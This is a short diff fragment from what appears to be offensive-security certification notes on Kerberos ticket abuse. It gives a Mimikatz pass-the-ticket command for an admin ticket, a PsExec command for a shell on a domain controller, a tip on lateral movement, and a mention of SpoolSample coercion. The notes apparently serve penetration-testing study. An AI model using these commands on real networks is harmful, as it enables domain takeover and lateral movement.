thamyekh/OSEP-Code-Snippets/osep_notes.md

 # ls to see all the tickets and find the one that matches your target
 Invoke-Mimikatz  -Command '"kerberos::ptt [0;10a3f5]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi"'
 C:\Tools\SysinternalsSuite\PsExec.exe /accepteula \\cdc01 cmd

+# troubleshooting
+- if you have imported the ticket and for some reason you can't move laterally you will need to run commands via powershell and not cmd
 ```
 ### semi-auto approach
 force dc to connect to application service using SpoolSample.exe